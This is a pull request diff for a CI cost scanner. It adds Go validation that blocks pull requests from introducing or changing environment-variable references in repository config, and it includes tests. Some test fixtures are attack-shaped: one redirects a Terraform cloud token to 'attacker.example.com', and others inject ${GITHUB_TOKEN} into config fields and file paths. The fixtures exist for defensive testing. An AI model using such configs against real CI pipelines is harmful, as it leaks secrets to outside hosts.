### PR TITLE
fix(scanner): trust base config environment references

### DIFF
--- a/tools/scanner/go.mod
+++ b/tools/scanner/go.mod
@@ -15,6 +15,7 @@ require (
 	github.com/stretchr/testify v1.11.1
 	golang.org/x/oauth2 v0.36.0
 	google.golang.org/protobuf v1.36.11
+	gopkg.in/yaml.v3 v3.0.1
 )
 
 require (
@@ -87,5 +88,4 @@ require (
 	golang.org/x/tools v0.45.0 // indirect
 	google.golang.org/genproto/googleapis/rpc v0.0.0-20251222181119-0a764e51fe1b // indirect
 	google.golang.org/grpc v1.79.3 // indirect
-	gopkg.in/yaml.v3 v3.0.1 // indirect
 )

--- a/tools/scanner/internal/commands/diff.go
+++ b/tools/scanner/internal/commands/diff.go
@@ -9,8 +9,8 @@ import (
 	"github.com/infracost/actions/tools/scanner/internal/api"
 	"github.com/infracost/actions/tools/scanner/internal/config"
 	"github.com/infracost/actions/tools/scanner/internal/git"
-	"github.com/infracost/go-proto/pkg/diagnostic"
 	pkgscanner "github.com/infracost/cli/pkg/scanner"
+	"github.com/infracost/go-proto/pkg/diagnostic"
 	"github.com/infracost/proto/gen/go/infracost/parser/event"
 	"github.com/infracost/proto/gen/go/infracost/provider"
 	"github.com/infracost/vcs/pkg/vcs"
@@ -30,9 +30,9 @@ type diffArgs struct {
 	project       string
 	pipelineRunID string
 	vcsProvider   string
-	githubToken     string
-	githubOwner     string
-	githubRepo      string
+	githubToken   string
+	githubOwner   string
+	githubRepo    string
 }
 
 // ScanResult holds the outcome of a scan, including whether policies or
@@ -117,6 +117,9 @@ func diff(cfg *config.Config, args *diffArgs, vcsClient vcs.VCS, results *ScanRe
 	runParams, err := config.ParseRunParameters(rawRunParams)
 	if err != nil {
 		return fmt.Errorf("failed to parse run parameters: %w", err)
+	}
+	if err := config.ValidateHeadConfigEnv(ctx, args.basePath, args.headPath, runParams.RepositoryName); err != nil {
+		return fmt.Errorf("repository config environment validation failed: %w", err)
 	}
 
 	token, err := tokenSource.Token()

--- a/tools/scanner/internal/config/config_env.go
+++ b/tools/scanner/internal/config/config_env.go
@@ -1,0 +1,200 @@
+package config
+
+import (
+	"bytes"
+	"context"
+	"fmt"
+	"os"
+	"path/filepath"
+	"strconv"
+	"strings"
+
+	pkgscanner "github.com/infracost/cli/pkg/scanner"
+	repoconfig "github.com/infracost/config"
+	"gopkg.in/yaml.v3"
+)
+
+// ValidateHeadConfigEnv rejects environment references that are not trusted by the base branch.
+func ValidateHeadConfigEnv(ctx context.Context, baseDir, headDir, repoName string) error {
+	basePath, baseTemplate := activeConfigPath(baseDir)
+	headPath, headTemplate := activeConfigPath(headDir)
+	if headPath == "" {
+		return nil
+	}
+
+	if headTemplate {
+		if basePath == "" || !baseTemplate {
+			return fmt.Errorf("%s cannot be introduced in a pull request", pkgscanner.RepoConfigTemplateFilename)
+		}
+		base, err := os.ReadFile(basePath) // #nosec G304 -- fixed filename under the trusted checkout
+		if err != nil {
+			return fmt.Errorf("read base repository config template: %w", err)
+		}
+		head, err := os.ReadFile(headPath) // #nosec G304 -- fixed filename under the untrusted checkout
+		if err != nil {
+			return fmt.Errorf("read head repository config template: %w", err)
+		}
+		if !bytes.Equal(base, head) {
+			return fmt.Errorf("%s cannot be changed in a pull request", pkgscanner.RepoConfigTemplateFilename)
+		}
+
+		baseScalars, err := templateConfigScalars(ctx, baseDir, base, repoName)
+		if err != nil {
+			return fmt.Errorf("render base repository config template: %w", err)
+		}
+		headScalars, err := templateConfigScalars(ctx, headDir, head, repoName)
+		if err != nil {
+			return fmt.Errorf("render head repository config template: %w", err)
+		}
+		return validateConfigScalars(baseScalars, headScalars)
+	}
+
+	headScalars, err := fileConfigScalars(headDir, headPath)
+	if err != nil {
+		return fmt.Errorf("read head repository config: %w", err)
+	}
+	baseScalars := map[string]configScalar{}
+	if basePath != "" && !baseTemplate {
+		baseScalars, err = fileConfigScalars(baseDir, basePath)
+		if err != nil {
+			return fmt.Errorf("read base repository config: %w", err)
+		}
+	}
+
+	return validateConfigScalars(baseScalars, headScalars)
+}
+
+func templateConfigScalars(ctx context.Context, dir string, template []byte, repoName string) (map[string]configScalar, error) {
+	opts := []repoconfig.GenerationOption{
+		repoconfig.WithTemplate(string(template)),
+		repoconfig.WithIgnorePermissionErrors(true),
+		repoconfig.WithIgnoreHiddenDirs(true),
+		repoconfig.WithSkipCDK(true),
+	}
+	if repoName != "" {
+		opts = append(opts, repoconfig.WithRepoName(repoName))
+	}
+	cfg, err := repoconfig.Generate(ctx, dir, opts...)
+	if err != nil {
+		return nil, err
+	}
+	content, err := yaml.Marshal(cfg)
+	if err != nil {
+		return nil, err
+	}
+	return configScalarsFromContent(content)
+}
+
+func fileConfigScalars(dir, path string) (map[string]configScalar, error) {
+	cfg, err := repoconfig.LoadConfigFile(path, dir, nil)
+	if err != nil {
+		return nil, err
+	}
+	content, err := yaml.Marshal(cfg)
+	if err != nil {
+		return nil, err
+	}
+	return configScalarsFromContent(content)
+}
+
+func validateConfigScalars(baseScalars, headScalars map[string]configScalar) error {
+	for path, scalar := range headScalars {
+		base := baseScalars[path]
+		if hasEnvReference(scalar.value) && (base.value != scalar.value || base.context != scalar.context) {
+			return fmt.Errorf("environment reference at %s must already exist unchanged on the base branch", scalar.displayPath)
+		}
+	}
+	return nil
+}
+
+func activeConfigPath(dir string) (string, bool) {
+	configPath := filepath.Join(dir, pkgscanner.RepoConfigFilename)
+	if fileExistsAt(configPath) {
+		return configPath, false
+	}
+	templatePath := filepath.Join(dir, pkgscanner.RepoConfigTemplateFilename)
+	if fileExistsAt(templatePath) {
+		return templatePath, true
+	}
+	return "", false
+}
+
+type configScalar struct {
+	value       string
+	displayPath string
+	context     string
+}
+
+func configScalarsFromContent(content []byte) (map[string]configScalar, error) {
+	var root yaml.Node
+	if err := yaml.Unmarshal(content, &root); err != nil {
+		return nil, err
+	}
+	out := make(map[string]configScalar)
+	collectScalars(&root, "", "", "", out, make(map[*yaml.Node]bool))
+	return out, nil
+}
+
+func collectScalars(node *yaml.Node, path, displayPath, context string, out map[string]configScalar, stack map[*yaml.Node]bool) {
+	if node == nil || stack[node] {
+		return
+	}
+	stack[node] = true
+	defer delete(stack, node)
+
+	switch node.Kind {
+	case yaml.DocumentNode:
+		for _, child := range node.Content {
+			collectScalars(child, path, displayPath, context, out, stack)
+		}
+	case yaml.MappingNode:
+		context = configNodeFingerprint(node)
+		for i := 0; i+1 < len(node.Content); i += 2 {
+			key := node.Content[i]
+			value := node.Content[i+1]
+			segment := strconv.Itoa(i / 2)
+			if key.Kind == yaml.ScalarNode {
+				segment = escapeConfigPath(key.Value)
+				out[path+"/key:"+segment] = configScalar{key.Value, displayPath + "/@key/" + segment, context}
+			}
+			collectScalars(value, path+"/map:"+segment, displayPath+"/"+segment, context, out, stack)
+		}
+	case yaml.SequenceNode:
+		for i, child := range node.Content {
+			segment := strconv.Itoa(i)
+			collectScalars(child, path+"/sequence:"+segment, displayPath+"/"+segment, context, out, stack)
+		}
+	case yaml.AliasNode:
+		collectScalars(node.Alias, path, displayPath, context, out, stack)
+	case yaml.ScalarNode:
+		out[path] = configScalar{node.Value, displayPath, context}
+	}
+}
+
+func configNodeFingerprint(node *yaml.Node) string {
+	content, _ := yaml.Marshal(node)
+	return string(content)
+}
+
+func escapeConfigPath(value string) string {
+	return strings.ReplaceAll(strings.ReplaceAll(value, "~", "~0"), "/", "~1")
+}
+
+func hasEnvReference(value string) bool {
+	found := false
+	_ = os.Expand(value, func(name string) string {
+		found = found || isEnvName(name)
+		return ""
+	})
+	return found
+}
+
+func isEnvName(name string) bool {
+	for i := range len(name) {
+		c := name[i]
+		if !((c >= 'a' && c <= 'z') || (c >= 'A' && c <= 'Z') || c == '_' || (i > 0 && c >= '0' && c <= '9')) {
+			return false
+		}
+	}
+	return name != ""
+}

--- a/tools/scanner/internal/config/config_env_test.go
+++ b/tools/scanner/internal/config/config_env_test.go
@@ -1,0 +1,160 @@
+package config
+
+import (
+	"os"
+	"path/filepath"
+	"testing"
+
+	"github.com/stretchr/testify/require"
+)
+
+func TestValidateHeadConfigEnv(t *testing.T) {
+	tests := []struct {
+		name         string
+		baseConfig   string
+		headConfig   string
+		baseTemplate string
+		headTemplate string
+		baseFiles    map[string]string
+		headFiles    map[string]string
+		wantErr      string
+	}{
+		{name: "no config"},
+		{
+			name:       "config change without environment reference",
+			baseConfig: "version: 0.3\nprojects:\n  - name: api\n    path: .\n",
+			headConfig: "version: 0.3\nprojects:\n  - name: web\n    path: .\n",
+		},
+		{
+			name:       "terraform capture group",
+			baseConfig: "version: 0.3\nprojects: []\n",
+			headConfig: "version: 0.3\nterraform:\n  source_map:\n    - match: example.com/(.*)\n      replace: mirror.example.com/${1}\nprojects: []\n",
+		},
+		{
+			name:       "unchanged environment reference",
+			baseConfig: "version: 0.3\nprojects:\n  - name: ${PROJECT_NAME}\n    path: .\n",
+			headConfig: "projects:\n  - path: .\n    name: ${PROJECT_NAME}\nversion: 0.3\n",
+		},
+		{
+			name:       "new environment reference",
+			baseConfig: "version: 0.3\nprojects:\n  - name: api\n    path: .\n",
+			headConfig: "version: 0.3\nprojects:\n  - name: ${GITHUB_TOKEN}\n    path: .\n",
+			wantErr:    "environment reference at /projects/0/name must already exist unchanged",
+		},
+		{
+			name:       "modified environment reference",
+			baseConfig: "version: 0.3\nprojects:\n  - name: ${PROJECT_NAME}\n    path: .\n",
+			headConfig: "version: 0.3\nprojects:\n  - name: prefix-${PROJECT_NAME}\n    path: .\n",
+			wantErr:    "environment reference at /projects/0/name must already exist unchanged",
+		},
+		{
+			name:       "moved environment reference",
+			baseConfig: "version: 0.3\nprojects:\n  - name: ${PROJECT_NAME}\n    path: .\n",
+			headConfig: "version: 0.3\nprojects:\n  - name: api\n    path: ${PROJECT_NAME}\n",
+			wantErr:    "environment reference at /projects/0/path must already exist unchanged",
+		},
+		{
+			name: "inherited environment reference with changed endpoint",
+			baseConfig: `version: 0.3
+terraform:
+  defaults:
+    cloud:
+      host: app.terraform.io
+      token: ${TFC_TOKEN}
+projects:
+  - name: main
+    path: .
+`,
+			headConfig: `version: 0.3
+terraform:
+  defaults:
+    cloud:
+      host: app.terraform.io
+      token: ${TFC_TOKEN}
+projects:
+  - name: main
+    path: .
+    terraform:
+      cloud:
+        host: attacker.example.com
+`,
+			wantErr: "environment reference at /projects/0/terraform/cloud/token must already exist unchanged",
+		},
+		{
+			name:         "unchanged template",
+			baseTemplate: "version: 0.3\nprojects:\n  - name: ${PROJECT_NAME}\n    path: .\n",
+			headTemplate: "version: 0.3\nprojects:\n  - name: ${PROJECT_NAME}\n    path: .\n",
+		},
+		{
+			name:         "new template",
+			headTemplate: "version: 0.3\nprojects: {{ .Projects }}\n",
+			wantErr:      "infracost.yml.tmpl cannot be introduced",
+		},
+		{
+			name:         "changed template",
+			baseTemplate: "version: 0.3\nprojects: []\n",
+			headTemplate: "version: 0.3\nprojects: {{ .Projects }}\n",
+			wantErr:      "infracost.yml.tmpl cannot be changed",
+		},
+		{
+			name:         "inactive template change",
+			baseConfig:   "version: 0.3\nprojects: []\n",
+			headConfig:   "version: 0.3\nprojects: []\n",
+			baseTemplate: "base",
+			headTemplate: "${GITHUB_TOKEN}",
+		},
+		{
+			name: "environment reference generated from template input",
+			baseTemplate: `version: 0.3
+projects:
+{{- range matchPaths "environment/:env/main.tf" }}
+  - path: .
+    name: {{ .env }}
+{{- end }}
+`,
+			headTemplate: `version: 0.3
+projects:
+{{- range matchPaths "environment/:env/main.tf" }}
+  - path: .
+    name: {{ .env }}
+{{- end }}
+`,
+			baseFiles: map[string]string{"environment/dev/main.tf": ""},
+			headFiles: map[string]string{"environment/${GITHUB_TOKEN}/main.tf": ""},
+			wantErr:   "environment reference at /projects/0/name must already exist unchanged",
+		},
+	}
+
+	for _, tt := range tests {
+		t.Run(tt.name, func(t *testing.T) {
+			baseDir := t.TempDir()
+			headDir := t.TempDir()
+			writeConfigTestFile(t, baseDir, "infracost.yml", tt.baseConfig)
+			writeConfigTestFile(t, headDir, "infracost.yml", tt.headConfig)
+			writeConfigTestFile(t, baseDir, "infracost.yml.tmpl", tt.baseTemplate)
+			writeConfigTestFile(t, headDir, "infracost.yml.tmpl", tt.headTemplate)
+			for name, content := range tt.baseFiles {
+				writeConfigTestFile(t, baseDir, name, content)
+			}
+			for name, content := range tt.headFiles {
+				writeConfigTestFile(t, headDir, name, content)
+			}
+
+			err := ValidateHeadConfigEnv(t.Context(), baseDir, headDir, "repo")
+			if tt.wantErr == "" {
+				require.NoError(t, err)
+			} else {
+				require.ErrorContains(t, err, tt.wantErr)
+			}
+		})
+	}
+}
+
+func writeConfigTestFile(t *testing.T, dir, name, content string) {
+	t.Helper()
+	if content == "" && (name == "infracost.yml" || name == "infracost.yml.tmpl") {
+		return
+	}
+	require.NoError(t, os.MkdirAll(filepath.Dir(filepath.Join(dir, name)), 0755))
+	require.NoError(t, os.WriteFile(filepath.Join(dir, name), []byte(content), 0600))
+}


### PR DESCRIPTION
Repository config currently expands the scanner's complete environment, so an untrusted pull request can move CI secrets into uploaded fields or outbound endpoints. This preserves environment references already approved on the base branch, binds them to their normalized config context, and rejects new or dynamically generated references. Active templates must remain base-identical because they can synthesize references from pull-request-controlled files.